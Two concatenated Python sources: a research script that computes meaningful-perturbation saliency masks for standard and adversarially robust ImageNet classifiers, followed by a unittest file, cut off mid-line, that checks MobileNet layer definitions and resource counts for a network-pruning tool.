######################################################################################################################## def get_arguments(): # Initialize the parser parser = argparse.ArgumentParser(description='Input paramters for meaningful perturbation explanation of the image') # Add the paramters positional/optional (here only optional) parser.add_argument('--mask_init', default='circular', type=str, choices=['circular', 'ones', 'random'], help='random|circular|ones. Default - circular') parser.add_argument('--mask_init_size', type=int, help='Size of mask to be initilaized. Default=224', default=224, ) parser.add_argument('--img_dir_path', help='Path to the image directory') parser.add_argument('--out_path', help='Path of the output directory where you want to save the results (Default is ./)') parser.add_argument('--tv_beta', type=float, help='TV_Beta value', default=3.0, ) parser.add_argument('--tv_coeff', type=float, help='TV Coefficient value', default=1e-2, ) parser.add_argument('--l1_coeff', type=float, help='L1 coefficient value', default=1e-4, ) parser.add_argument('--category_coeff', type=float, help='Category coefficient value', default=1, ) parser.add_argument('--learning_rate', type=float, help='Learning rate', default=0.1, ) parser.add_argument('--num_iter', type=int, help='Maximum Iterations', default=300, ) parser.add_argument('--seed', type=int, help='Seed for reproducability.', default=None, ) parser.add_argument('--jitter', type=int, help='Jitter. Default=4', default=4, ) parser.add_argument('--blur_radius', type=int, help='Blur Radius. Default=10', default=10, ) parser.add_argument('--start_idx', type=int, help='Start index for selecting images. Default: 0', default=0, ) parser.add_argument('--end_idx', type=int, help='End index for selecting images. Default: 1735', default=1735, ) parser.add_argument('--idx_flag', type=int, help=f'Flag whether to use some images in the folder (1) or all (0). ' f'This is just for testing purposes. ' f'Default=0', default=0, ) parser.add_argument('--if_save_npy', type=int, choices=range(2), help='Flag whether to save npy version of masks or not. Default=Yes (1)', default=1, ) parser.add_argument('--if_save_plot', type=int, choices=range(2), help='Flag whether to save plot or not. Default=No (0)', default=0, ) parser.add_argument('--if_save_mask_evolution', type=int, choices=range(2), help='Flag whether to save evolution of mask or not. Default=No (0)', default=0, ) parser.add_argument('--if_noise', type=int, choices=range(2), help='Flag whether to add Gaussian noise to the image or not before processing. Default=No (0)', default=0, ) parser.add_argument('--noise_seed', type=int, help='Seed for Gaussian noise. Default=0', default=0, ) parser.add_argument('--noise_mean', type=float, help='Mean of gaussian noise. Default: 0', default=0, ) parser.add_argument('--noise_var', type=float, help='Variance of gaussian noise. Default: 0.1', default=0.1, ) # Parse the arguments args = parser.parse_args() if args.seed is not None: print(f'Using the numpy seed: {args.seed}') np.random.seed(seed=args.seed) if args.out_path is None: args.out_path = './' args.out_path = os.path.abspath(args.out_path) + '/' if args.img_dir_path is None: print("\nImage Dir Path not given.\nExiting") sys.exit(0) elif os.path.isdir(args.img_dir_path): args.img_dir_path = os.path.abspath(args.img_dir_path) else: print('\nIncorrect dir path.\nExiting\n') sys.exit(1) if args.num_iter < 0: parser.error("-mi/--num_iter: must be a positive integer") return args ######################################################################################################################## class DataProcessing: def __init__(self, data_path, img_idxs=[0, 1], idx_flag=1): self.data_path = data_path if data_path == abs_path(settings.imagenet_val_path): aa = img_name_list[img_idxs[0]:img_idxs[1]] self.img_filenames = [os.path.join(data_path, f'{ii}.JPEG') for ii in aa] else: self.img_filenames = [] for file in glob.glob(os.path.join(data_path, "*.JPEG")): self.img_filenames.append(file) self.img_filenames.sort() self.img_filenames = self.img_filenames[:50] print(f'\nNo. of images to be analyzed are {len(self.img_filenames)}\n') if idx_flag == 1: print('Only prodicing results for 1 image') img_idxs = [0] self.img_filenames = [self.img_filenames[i] for i in img_idxs] def __getitem__(self, index): y = self.get_image_class(os.path.join(self.data_path, self.img_filenames[index])) return y, os.path.join(self.data_path, self.img_filenames[index]) def __len__(self): return len(self.img_filenames) def get_image_class(self, filepath): base_dir = '/home/naman/CS231n/heatmap_tests/' # ImageNet 2012 validation set images? with open(os.path.join(settings.imagenet_class_mappings, "ground_truth_val2012")) as f: # with open(os.path.join(base_dir, "imagenet_class_mappings", "ground_truth_val2012")) as f: ground_truth_val2012 = {x.split()[0]: int(x.split()[1]) for x in f.readlines() if len(x.strip()) > 0} with open(os.path.join(settings.imagenet_class_mappings, "synset_id_to_class")) as f: # with open(os.path.join(base_dir, "imagenet_class_mappings", "synset_id_to_class")) as f: synset_to_class = {x.split()[1]: int(x.split()[0]) for x in f.readlines() if len(x.strip()) > 0} def get_class(f): # File from ImageNet 2012 validation set ret = ground_truth_val2012.get(f, None) if ret is None: # File from ImageNet training sets ret = synset_to_class.get(f.split("_")[0], None) if ret is None: # Random JPEG file ret = 1000 return ret image_class = get_class(filepath.split('/')[-1]) return image_class ######################################################################################################################## def load_data(img_dir, batch_size=1, img_idxs=[0, 1], idx_flag=1): data = DataProcessing(img_dir, img_idxs=img_idxs, idx_flag=idx_flag) test_loader = torch.utils.data.DataLoader(data, batch_size=1) return test_loader, len(data) ######################################################################################################################## def numpy_to_torch(img, requires_grad=True): if len(img.shape) < 3: output = np.float32([img]) else: output = np.transpose(img, (2, 0, 1)) output = torch.from_numpy(output) if use_cuda: output = output.to('cuda') # cuda() output.unsqueeze_(0) v = Variable(output, requires_grad=requires_grad) return v ######################################################################################################################## def unnormalize(img): means = [0.485, 0.456, 0.406] stds = [0.229, 0.224, 0.225] preprocessed_img = img.copy() for i in range(3): preprocessed_img[:, :, i] = preprocessed_img[:, :, i] * stds[i] preprocessed_img[:, :, i] = preprocessed_img[:, :, i] + means[i] return preprocessed_img ######################################################################################################################## def unnormalize_madry(img): means = [0, 0, 0] stds = [1, 1, 1] preprocessed_img = img.copy() for i in range(3): preprocessed_img[:, :, i] = preprocessed_img[:, :, i] * stds[i] preprocessed_img[:, :, i] = preprocessed_img[:, :, i] + means[i] return preprocessed_img ######################################################################################################################## def normalize(img): means = [0.485, 0.456, 0.406] stds = [0.229, 0.224, 0.225] preprocessed_img = img.copy() for i in range(3): preprocessed_img[:, :, i] = preprocessed_img[:, :, i] * stds[i] preprocessed_img[:, :, i] = preprocessed_img[:, :, i] + means[i] preprocessed_img = np.expand_dims(preprocessed_img, 0) return preprocessed_img ######################################################################################################################## def create_blurred_circular_mask(mask_shape, radius, center=None, sigma=10): assert (len(mask_shape) == 2) if center is None: x_center = int(mask_shape[1] / float(2)) y_center = int(mask_shape[0] / float(2)) center = (x_center, y_center) y, x = np.ogrid[-y_center:mask_shape[0] - y_center, -x_center:mask_shape[1] - x_center] mask = x * x + y * y <= radius * radius grid = np.zeros(mask_shape) grid[mask] = 1 if sigma is not None: grid = scipy.ndimage.filters.gaussian_filter(grid, sigma) return grid ######################################################################################################################## def create_blurred_circular_mask_pyramid(mask_shape, radii, sigma=10): assert (len(mask_shape) == 2) num_masks = len(radii) masks = np.zeros((num_masks, 3, mask_shape[0], mask_shape[1])) for i in range(num_masks): masks[i, :, :, :] = create_blurred_circular_mask(mask_shape, radii[i], sigma=sigma) return masks ######################################################################################################################## def test_circular_masks(model, o_img, m_size, upsample, gt_category, preprocess_image, radii=np.arange(0, 175, 5), thres=1e-2, ): # net_transformer = get_ILSVRC_net_transformer(net) size = 224 masks = create_blurred_circular_mask_pyramid((m_size, m_size), radii) masks = 1 - masks u_mask = upsample(torch.from_numpy(masks)).float().to('cuda') num_masks = len(radii) img = preprocess_image(np.float32(o_img) / 255, size) gradient = np.zeros((1, 1000)) gradient[0][gt_category] = 1 # ipdb.set_trace() scores = np.zeros(num_masks) batch_masked_img = [] for i in range(num_masks): null_img = preprocess_image(get_blurred_img(np.float32(o_img)), size) ##TODO: blurred image operating on BRG masked_img = img.mul(u_mask[i]) + null_img.mul(1 - u_mask[i]) outputs = F.softmax(model(masked_img), dim=1) scores[i] = outputs[0, gt_category].cpu().detach() batch_masked_img.append(masked_img) img_output = torch.nn.Softmax(dim=1)(model(img)).cpu().detach() orig_score = img_output[0, gt_category] percs = (scores - scores[-1]) / float(orig_score - scores[-1]) try: first_i = np.where(percs < thres)[0][0] except: first_i = -1 return radii[first_i] ######################################################################################################################## def get_blurred_img(img, radius=10): img = Image.fromarray(np.uint8(img)) blurred_img = img.filter(ImageFilter.GaussianBlur(radius)) return np.array(blurred_img) / float(255) ######################################################################################################################## def pytorch_preprocess_image(img, size): transform = transforms.Compose([ transforms.ToPILImage(), transforms.Resize((size + 32, size + 32)), # 224+32 =256 transforms.CenterCrop(size), transforms.ToTensor(), ]) preprocessed_img_tensor = transform(np.uint8(255 * img)) means = [0.485, 0.456, 0.406] stds = [0.229, 0.224, 0.225] preprocessed_img = preprocessed_img_tensor.permute(1, 2, 0).numpy()[:, :, ::-1] preprocessed_img = (preprocessed_img - means) / stds if use_cuda: preprocessed_img_tensor = torch.from_numpy(preprocessed_img).to('cuda') else: preprocessed_img_tensor = torch.from_numpy(preprocessed_img) # preprocessed_img_tensor = torch.from_numpy(preprocessed_img_tensor) preprocessed_img_tensor.requires_grad = False preprocessed_img_tensor = preprocessed_img_tensor.permute(2, 0, 1) preprocessed_img_tensor.unsqueeze_(0) preprocessed_img_tensor = preprocessed_img_tensor.float() preprocessed_img_tensor.requires_grad = False return preprocessed_img_tensor ######################################################################################################################## def madry_preprocess_image(img, size): transform = transforms.Compose([ transforms.ToPILImage(), transforms.Resize((size + 32, size + 32)), # 224+32 =256 transforms.CenterCrop(size), transforms.ToTensor(), ]) preprocessed_img_tensor = transform(np.uint8(255 * img)) means = [0, 0, 0] stds = [1, 1, 1] preprocessed_img = preprocessed_img_tensor.permute(1, 2, 0).numpy()[:, :, ::-1] preprocessed_img = (preprocessed_img - means) / stds if use_cuda: preprocessed_img_tensor = torch.from_numpy(preprocessed_img).to('cuda') else: preprocessed_img_tensor = torch.from_numpy(preprocessed_img) # preprocessed_img_tensor = torch.from_numpy(preprocessed_img_tensor) preprocessed_img_tensor.requires_grad = False preprocessed_img_tensor = preprocessed_img_tensor.permute(2, 0, 1) preprocessed_img_tensor.unsqueeze_(0) preprocessed_img_tensor = preprocessed_img_tensor.float() preprocessed_img_tensor.requires_grad = False return preprocessed_img_tensor ######################################################################################################################## def tv_norm(input, tv_beta): img = input[0, 0, :] row_grad = torch.abs((img[:-1, :] - img[1:, :])).pow(tv_beta).sum() col_grad = torch.abs((img[:, :-1] - img[:, 1:])).pow(tv_beta).sum() return row_grad + col_grad ######################################################################################################################## def create_random_maks(size, init): if init == 'random': mask = np.random.rand(size, size) elif init == 'ones': mask = np.ones((size, size)) else: print('Incorrect Init!\nExiting') sys.exit(0) return mask ######################################################################################################################## def add_text(x, text, x_pt, size, scale): # --- Here I created a white background to include the text --- text_patch = np.zeros((25, x.shape[1], 3), np.uint8) text_patch[:] = (255, 255, 255) # --- I then concatenated it vertically to the image with the border --- vcat = cv2.vconcat((text_patch, x)) # --- Now I included some text --- font = cv2.FONT_HERSHEY_SIMPLEX cv2.putText(vcat, text, (x_pt, 15), font, size, (0, 0, 0), scale, 0) return vcat ######################################################################################################################## def save_mask(mask, label, label_prob, max_prob, max_label, save_path, ind, tot_iters, im_sz, f_time, model_name, **kwargs): # label is gt_category category_map_dict = eutils.imagenet_label_mappings() mask = get_blurred_img(255 * mask, 1) mask = 1 - mask aa = cv2.applyColorMap(np.uint8(255 * mask), cv2.COLORMAP_VIRIDIS) aa = cv2.resize(aa, (im_sz, im_sz)) aa = add_text(aa, 'Target: {} {:.3f}'.format(category_map_dict[label].split(',')[0], label_prob), **kwargs) # x_pt=50, scale=1, size=0.35) aa = add_text(aa, 'Top-1: {} {:.3f}'.format(category_map_dict[max_label].split(',')[0], max_prob), **kwargs) aa = add_text(aa, 'Index is: {:3d}/{}'.format(ind, tot_iters), **kwargs) temp_path = os.path.join(save_path, f'evolution_mask_time_{f_time}/{model_name}') eutils.mkdir_p(temp_path) cv2.imwrite(os.path.join(temp_path, "Model_{}_{:03d}_mask_{}.png".format(model_name, ind, label)), aa) ######################################################################################################################## def add_gaussian_noise(orig_img, mean=0, var=0.1, seed=0): ## orig_img is BGR format aa = orig_img.copy() aa = aa[:, :, ::-1] # converting BGR to RGB aa = skimage.util.random_noise(aa, mode='gaussian', mean=mean, var=var, seed=seed) # numpy, dtype=float64,range (0, 1) aa = Image.fromarray(np.uint8(aa * 255)) # convert noisy Image to PIL format aa = np.asarray(aa) # numpy image, dtype=uint8, range (0-255) (RGB format) aa = aa[:, :, ::-1] # converting RGB to BGR return aa ######################################################################################################################## def save_init_mask(numpy_mask, save_path, img_name, f_time, model_name, save_npy=0, post_pro=0): if save_npy == 1: temp_path = os.path.join(save_path, f'time_{f_time}_' f'evolution_mask_' f'imN_{img_name}/Model_{model_name}') eutils.mkdir_p(temp_path) temp_npy_path = os.path.join(temp_path, f"imN_{int(img_name.split('_')[-1]):05d}_" f"postPro_{post_pro}_" f"init_mask_" f"{model_name}.npy") np.save(temp_npy_path, numpy_mask) ######################################################################################################################## if __name__ == '__main__': s_time = time.time() f_time = ''.join(str(s_time).split('.')) args = get_arguments() ####################### ## #Hyperparameters img_shape = 224 args.save_path = args.out_path tv_beta = args.tv_beta learning_rate = args.learning_rate max_iterations = args.num_iter l1_coeff = args.l1_coeff tv_coeff = args.tv_coeff size = 224 jitter = args.jitter category_coeff = args.category_coeff blur_radius = args.blur_radius im_label_map = eutils.imagenet_label_mappings() ################################### data_loader, img_count = load_data(args.img_dir_path, batch_size=1, img_idxs=[args.start_idx, args.end_idx], idx_flag=args.idx_flag) ## DO NOT JUST MAKE ATTACKER MODEL AS FALSE IN THIS CODE model_names = [] model_names.append('pytorch') model_names.append('googlenet') model_names.append('madry') #Robust_ResNet model_names.append('madry_googlenet') #Robust GoogleNet print(model_names) preprocessing_fns = {'pytorch': eval('pytorch_preprocess_image'), 'madry': eval('madry_preprocess_image'), 'madry_googlenet': eval('madry_preprocess_image'), 'googlenet': eval('pytorch_preprocess_image')} load_model_fns = {'pytorch': eval('eutils.load_orig_imagenet_model'), 'madry': eval('eutils.load_madry_model'), 'madry_googlenet': eval('eutils.load_madry_model'), 'googlenet': eval('eutils.load_orig_imagenet_model')} load_model_args = {'pytorch': 'resnet50', 'madry': 'madry', 'madry_googlenet': 'madry_googlenet', 'googlenet': 'googlenet'} unnormalize_fn_dict = {'pytorch': eval('unnormalize'), 'madry': eval('unnormalize_madry'), 'madry_googlenet': eval('unnormalize_madry'), 'googlenet': eval('unnormalize')} heatmaps = {'pytorch': 0, 'madry': 0, 'madry_googlenet': 0, 'googlenet': 0} probs_dict = {'pytorch': 0, 'madry': 0, 'madry_googlenet': 0, 'googlenet': 0} final_probs_dict = {'pytorch': 0, 'madry': 0, 'madry_googlenet': 0, 'googlenet': 0} prepro_images = {'pytorch': 0, 'madry': 0, 'madry_googlenet': 0, 'googlenet': 0} l1_loss_dict = {'pytorch': [], 'madry': [], 'madry_googlenet': [], 'googlenet': []} tv_loss_dict = {'pytorch': [], 'madry': [], 'madry_googlenet': [], 'googlenet': []} cat_loss_dict = {'pytorch': [], 'madry': [], 'madry_googlenet': [], 'googlenet': []} res_mask_npy = np.zeros((len(model_names), img_shape, img_shape)) ######################################################### ## #Upsampling fn if use_cuda: upsample = torch.nn.UpsamplingNearest2d(size=(size, size)).cuda() else: upsample = torch.nn.UpsamplingNearest2d(size=(size, size)) ################################################################ ## Out_path # mask_size = 224 mask_size = args.mask_init_size par_name = f'sI_{args.start_idx:04d}_eI_{args.end_idx:04d}_' \ f'iter_{max_iterations:03d}_' \ f'blurR_{blur_radius:02d}_seed_{args.seed}_' \ f'mT_{args.mask_init[:4]}_mS_{mask_size:03d}_' \ f'ifN_{args.if_noise}_nS_{args.noise_seed}' print(f'Par_Name is {par_name}') if args.mask_init in ['random', 'ones']: orig_mask = create_random_maks(mask_size, args.mask_init) # elif args.mask_init == 'ones': # orig_mask = create_random_maks(mask_size, args.mask_init) for idx, model_name in enumerate(model_names): print(f'\n\nAnalyzing for model: {model_name}') load_model = load_model_fns[model_name] model_arg = load_model_args[model_name] preprocess_image = preprocessing_fns[model_name] unnormalize_fn = unnormalize_fn_dict[model_name] ## Load Model print(f'Loading model: {model_name}') model = load_model(arch=model_arg, if_pre=1) # Returns logits for ii, (targ_class, img_path) in enumerate(data_loader): batch_time = time.time() print(f'Analysing batch: {ii} of size {len(targ_class)}') targ_class = targ_class.cpu().item() gt_category = targ_class # print(f'Orig class label is {targ_class}') # print(f'Orig class name is {im_label_map[targ_class]}') img_name = img_path[0].split('/')[-1].split('.')[0] print(f'Image Name is {img_name}') out_dir = os.path.join(args.out_path, f'{img_name}') save_path = out_dir eutils.mkdir_p(out_dir) ##################################### original_img = cv2.imread(img_path[0], 1) # BGR Format if args.if_noise == 1: print('Adding gaussian noise to the image') original_img = add_gaussian_noise(original_img, mean=args.noise_mean, var=args.noise_var, seed=args.noise_seed) # BGR format shape = original_img.shape ## Preprocess Image print(f'Preprocessing image') img = np.float32(original_img) / 255 img = preprocess_image(img, size + jitter) # img prepro_images[model_name] = img ## Checking whether prediction matches the orig label # Will break if prediction does not match for any of the models outputs = F.softmax(model(img[:, :, :size, :size]), dim=1) pred_prob, pred_label = torch.max(outputs, dim=-1) pred_prob = pred_prob.cpu().item() pred_label = pred_label.cpu().item() print(f'Pred class is {pred_label} and prob is {pred_prob}') probs_dict[model_name] = pred_prob ################################################## print(f'Initializing with {args.mask_init} mask') if args.mask_init in ['random', 'ones']: mask = orig_mask.copy() else: # CAFFE mask_init mask_radius = test_circular_masks(model, original_img, mask_size, upsample, gt_category, preprocess_image, ) print(f'Mask Radius is {mask_radius}') mask = 1 - create_blurred_circular_mask((mask_size, mask_size), mask_radius, center=None, sigma=10) # ipdb.set_trace() mask = numpy_to_torch(mask) ############################# ## #Save initial mask ## if args.if_save_mask_evolution == 1: ## aa = 1 - get_blurred_img(upsample(mask).data.cpu().numpy()[0, 0, :, :]*255, ## radius=1) ## save_init_mask(aa, ## save_path, img_name, f_time, model_name, ## save_npy=args.if_save_npy, post_pro=1) # save_init_mask(upsample(mask).data.cpu().numpy()[0, 0], # save_path, img_name, f_time, model_name, # save_npy=args.if_save_npy, post_pro=0) ################################ ## Blurred Image null_img = preprocess_image(get_blurred_img(np.float32(original_img), radius=blur_radius), size + jitter) ## Optimizer optimizer = torch.optim.Adam([mask], lr=learning_rate) #################################################### print("Optimizing.. ", end='') l1 = [] # l1 loss l2 = [] # tv_loss l3 = [] # category_loss cuml = [] # iter_true_prob = [] # iter_max_prob = [] # iter_max_idx = [] for i in range(max_iterations): if jitter != 0: j1 = np.random.randint(jitter) j2 = np.random.randint(jitter) else: j1 = 0 j2 = 0 upsampled_mask = upsample(mask) # The single channel mask is used with an RGB image, # so the mask is duplicated to have 3 channel, upsampled_mask = upsampled_mask.expand(1, 3, upsampled_mask.size(2), upsampled_mask.size(3)) perturbated_input = img[:, :, j1:(size + j1), j2:(size + j2)].mul(upsampled_mask) + \ null_img[:, :, j1:(size + j1), j2:(size + j2)].mul(1 - upsampled_mask) outputs = F.softmax(model(perturbated_input), dim=1) ####################### ## Loss l1_loss = l1_coeff * torch.sum(torch.abs(1 - mask)) tv_loss = tv_coeff * tv_norm(mask, tv_beta) cat_loss = category_coeff * outputs[0, gt_category] loss = l1_loss + tv_loss + cat_loss ## total loss # For plotting the loss function l1.append(l1_loss.item()) l2.append(tv_loss.item()) l3.append(cat_loss.item()) cuml.append(loss.item()) optimizer.zero_grad() loss.backward() optimizer.step() mask.data.clamp_(0, 1) ############################# ## #Evolution plots if args.if_save_mask_evolution == 1: max_prob, max_ind = outputs.max(dim=1) kwargs = {'x_pt': 5, 'scale': 1, 'size': 0.35} if args.if_save_plot == 1: save_mask(upsample(mask).cpu().data.numpy()[0, 0, :], gt_category, outputs[0, gt_category].item(), max_prob.item(), max_ind.item(), save_path, i, max_iterations, img_shape, f_time, model_name, **kwargs) if args.if_save_npy == 1: # if (i+1)%10 == 0: if i in [299, ]: temp_path = os.path.join(save_path, f'time_{f_time}_' f'evolution_mask_' f'imN_{img_name}/Model_{model_name}') eutils.mkdir_p(temp_path) temp_npy_path = os.path.join(temp_path, f"imN_{int(img_name.split('_')[-1]):05d}_" f"postPro_1_" f"iter_{i:03d}_" f"iterProb_{outputs[0, gt_category].item():.3f}_" f"iterMaxProb_{max_prob.item():.3f}_" # FMP - final_max_prob f"iterMaxInd_{max_ind.item():3d}_" f"{model_name}.npy") t_mask = 1 - get_blurred_img(upsample(mask).data.cpu().numpy()[0, 0, :, :]*255, radius=1) np.save(temp_npy_path, t_mask) ################################ # optimizer.zero_grad() # loss.backward() # optimizer.step() # mask.data.clamp_(0, 1) print('Done') ## End of Optimization ################################################ if i == max_iterations - 1: final_max_prob, final_max_ind = outputs.max(dim=1) final_pred_prob = outputs[0, gt_category].cpu().detach().item() final_probs_dict[model_name] = final_pred_prob print(f'Prob after optimization is {outputs[0, gt_category]}') upsampled_mask = upsample(mask) mask = upsampled_mask mask = mask.cpu().detach().numpy()[0, 0, :] mask = get_blurred_img(255 * mask, radius=1) mask = 1 - mask if args.if_save_npy == 1: npy_path = os.path.join(save_path, f"mp_imN_{int(img_name.split('_')[-1]):05d}_" f"FTP_{final_pred_prob:.3f}_" # FTP - final_true_prob f"FMP_{final_max_prob.item():.3f}_" # FMP - final_max_prob f"FMInd_{final_max_ind.item():3d}_{par_name}_" # FMInd - final_max_ind f"model_name_{model_name}.npy") # npy_path = os.path.join(save_path, # f"t_{f_time}_imN_{int(img_name.split('_')[-1]):05d}_" # f"FTP_{final_pred_prob:.3f}_" #FTP - final_true_prob # f"FMP_{final_max_prob.item():.3f}_" #FMP - final_max_prob # f"FMInd_{final_max_ind.item():3d}_{par_name}_" # FMInd - final_max_ind # f"{model_name}.npy") np.save(npy_path, mask) assert mask.shape[0] == img_shape # heatmaps[model_name] = mask # res_mask_npy[idx] = mask print(f'Batch time is {time.time() - batch_time}\n') # # ################################# # if args.idx_flag == 1: # if args.if_save_npy == 1: # ## Saving npy files # # TODO: ADD Orig Image and well as other details (orig_prob, pred_prob, img_path etc). # # TODO: As well as label for each dimensions # npy_path = os.path.join(save_path, f"NPY_{par_name}_time_{f_time}.npy") # np.save(npy_path, res_mask_npy) # # j1 = 0 # j2 = 0 # pytorch_img = prepro_images['pytorch'] # madry_img = prepro_images['madry'] # # pytorch_img = unnormalize( # np.moveaxis(pytorch_img[:, :, j1:(size + j1), j2:(size + j2)][0, :].cpu().detach().numpy().transpose(), 0, 1)) # madry_img = unnormalize_madry( # np.moveaxis(madry_img[:, :, j1:(size + j1), j2:(size + j2)][0, :].cpu().detach().numpy().transpose(), 0, 1)) # # assert np.amax(np.abs(pytorch_img - madry_img)) < 1e-7 # # ## Plotting # grid = [] # grid.append([madry_img, heatmaps['googlenet'], heatmaps['pytorch'], heatmaps['madry']]) # # ipdb.set_trace() # googlenet_prob = final_probs_dict['googlenet'] # resnet_prob = final_probs_dict['pytorch'] # madry_prob = final_probs_dict['madry'] # col_labels = ['Orig Image', # f'GoogleNet\nFinal_Prob:{googlenet_prob:.3f}', # f'ResNet_MP\nFinal_Prob:{resnet_prob:.3f}', # f'Madry_ResNet_MP\nFinal_Prob:{madry_prob:.3f}'] # # text = [] # text.append(("%.3f" % probs_dict['madry'], # Madry prob (pL) # "%3d" % targ_class, # Madry Label (pL) # "%.3f" % probs_dict['pytorch'], # pytorch_prob (pL) # "%3d" % targ_class, # Pytorch Label (pL) # "%.3f" % probs_dict['googlenet'], # pytorch_prob (pL) # "%3d" % targ_class, # Pytorch Label (pL) # "%3d" % targ_class, # label for given neuron (cNL) # )) # # madryProb, madryLabel, pytorchProb, pytorchLabel, googlenetProb, googlenetLabel, trueLabel = zip(*text) # row_labels_left = [(f'Madry: Top-1:\n{im_label_map[int(madryLabel[i])]}: {madryProb[i]}\n', # f'ResNet: Top-1:\n{im_label_map[int(pytorchLabel[i])]}: {pytorchProb[i]}\n', # f'GoogleNet: Top-1:\n{im_label_map[int(googlenetLabel[i])]}: {googlenetProb[i]}\n', # f'Target Label: {int(trueLabel[i])}\n{im_label_map[int(trueLabel[i])]}') # for i in range(len(madryProb))] # # row_labels_right = [] # # eutils.zero_out_plot_multiple_patch(grid, # save_path, # row_labels_left, # row_labels_right, # col_labels, # file_name=f'MP_heatmap_{par_name}_time_{f_time}.jpeg', # dpi=img_shape, # ) print(f'\nTime taken is {time.time() - s_time}') print(f'TIme stamp is {f_time}') aa = 1 ########################################################################################################################
440148
import torch import os import sys import pickle sys.path.append(os.path.abspath('../')) import network_utils as networkUtils import unittest import nets as models from constants import * import copy MODEL_ARCH = 'mobilenet' INPUT_DATA_SHAPE = (3, 224, 224) LOOKUP_TABLE_PATH = os.path.join('../models', MODEL_ARCH, 'lut.pkl') DATASET_PATH = '../data/' model = models.__dict__[MODEL_ARCH](num_classes=10) network_utils = networkUtils.__dict__[MODEL_ARCH](model, INPUT_DATA_SHAPE, DATASET_PATH) class TestNetworkUtils_mobilenet(unittest.TestCase): def __init__(self, *args, **kwargs): super(TestNetworkUtils_mobilenet, self).__init__(*args, **kwargs) def check_network_def(self, network_def, input_channels, output_channels, only_num_channels=False): self.assertEqual(len(network_def), 28, "network_def length error") layer_idx = 0 for layer_name, layer_properties in network_def.items(): self.assertEqual(layer_properties[KEY_NUM_IN_CHANNELS], input_channels[layer_idx], "network_def num of input channels error") self.assertEqual(layer_properties[KEY_NUM_OUT_CHANNELS], output_channels[layer_idx], "network_def num of output channels error") if layer_idx % 2 == 1 and layer_idx != 27: self.assertTrue(layer_properties[KEY_IS_DEPTHWISE], "network_def is_depthwise error") self.assertEqual(layer_properties[KEY_GROUPS], layer_properties[KEY_NUM_IN_CHANNELS], "network_def group error") else: self.assertFalse(layer_properties[KEY_IS_DEPTHWISE], "network_def is_depthwise error") self.assertEqual(layer_properties[KEY_GROUPS], 1, "network_def group error") if layer_idx == 27 or (layer_idx % 2 == 0 and layer_idx != 0): self.assertEqual(layer_properties[KEY_KERNEL_SIZE], (1, 1), "network_def kernel size error") self.assertEqual(layer_properties[KEY_PADDING], (0, 0), "network_def padding error") else: self.assertEqual(layer_properties[KEY_KERNEL_SIZE], (3, 3), "network_def kernel size error") self.assertEqual(layer_properties[KEY_PADDING], (1, 1), "network_def padding error") if layer_idx != 27: self.assertEqual(layer_properties[KEY_LAYER_TYPE_STR], 'Conv2d', "network_def layer type string error") else: self.assertEqual(layer_properties[KEY_LAYER_TYPE_STR], 'Linear', "network_def layer type string error") if layer_idx in [0, 3, 7, 11, 23]: self.assertEqual(layer_properties[KEY_STRIDE], (2, 2), "network_def stride error") else: self.assertEqual(layer_properties[KEY_STRIDE], (1, 1), "network_def stride error") input_feature_map_spatial_size = [224, 112, 112, 112, 56, 56, 56, 56, 28, 28, 28, 28, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 7, 7, 7, 1] output_feature_map_spatial_size = [112, 112, 112, 56, 56, 56, 56, 28, 28, 28, 28, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 7, 7, 7, 7, 1] if not only_num_channels: self.assertEqual(layer_properties[KEY_INPUT_FEATURE_MAP_SIZE], [1, input_channels[layer_idx], input_feature_map_spatial_size[layer_idx], input_feature_map_spatial_size[layer_idx]], "network_def input feature map size error") self.assertEqual(layer_properties[KEY_OUTPUT_FEATURE_MAP_SIZE], [1, output_channels[layer_idx], output_feature_map_spatial_size[layer_idx], output_feature_map_spatial_size[layer_idx]], "network_def output feature map size error") #print(layer_idx) layer_idx += 1 def gen_layer_weight(self, tensor): gen_tensor = torch.zeros_like(tensor) for i in range(gen_tensor.shape[0]): gen_tensor[i, ::] += i return gen_tensor def test_network_def(self): network_def = network_utils.get_network_def_from_model(model) #print(network_def) #print(len(network_def)) input_channels = [3, 32, 32, 64, 64, 128, 128, 128, 128, 256, 256, 256, 256, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 1024, 1024, 1024] output_channels = [32, 32, 64, 64, 128, 128, 128, 128, 256, 256, 256, 256, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 1024, 1024, 1024, 10] self.check_network_def(network_def, input_channels, output_channels) self.assertEqual(network_utils.get_num_simplifiable_blocks(), 14, "Num of simplifiable blocks error") def test_compute_resource(self): network_def = network_utils.get_network_def_from_model(model) num_w = network_utils.compute_resource(network_def, 'WEIGHTS') num_mac = network_utils.compute_resource(network_def, 'FLOPS') self.assertEqual(num_w, 3195328, "Num of weights error") self.assertEqual(num_mac, 567726592, "Num of MACs error") def test_extra_history_info(self): network_def = network_utils.get_network_def_from_model(model) output_feature_info = network_utils.extra_history_info(network_def) output_channels = [32, 32, 64, 64, 128, 128, 128, 128, 256, 256, 256, 256, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 1024, 1024, 1024, 10] output_channels_str = [str(x) for x in output_channels] output_feature_info_gt = ' '.join(output_channels_str) self.assertEqual(output_feature_info, output_feature_info_gt, "extra_history_info error") def delta_to_layer_num_channels(self, delta, simp_block_idx): input_channels_gt = [3, 32, 32, 64, 64, 128, 128, 128, 128, 256, 256, 256, 256, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 1024, 1024, 1024] output_channels_gt = [32, 32, 64, 64, 128, 128, 128, 128, 256, 256, 256, 256, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 1024, 1024, 1024, 10] if simp_block_idx == 0: input_channels_gt[simp_block_idx + 1] = input_channels_gt[simp_block_idx + 1] - delta input_channels_gt[simp_block_idx + 2] = input_channels_gt[simp_block_idx + 2] - delta output_channels_gt[simp_block_idx] = output_channels_gt[simp_block_idx] - delta output_channels_gt[simp_block_idx+1] = output_channels_gt[simp_block_idx+1] - delta elif simp_block_idx != 13: print(input_channels_gt) print(output_channels_gt) input_channels_gt[2*simp_block_idx+1] = input_channels_gt[2*simp_block_idx+1] - delta input_channels_gt[2*simp_block_idx+2] = input_channels_gt[2*simp_block_idx+2] - delta output_channels_gt[2*simp_block_idx] = output_channels_gt[2*simp_block_idx] - delta output_channels_gt[2*simp_block_idx+1]= 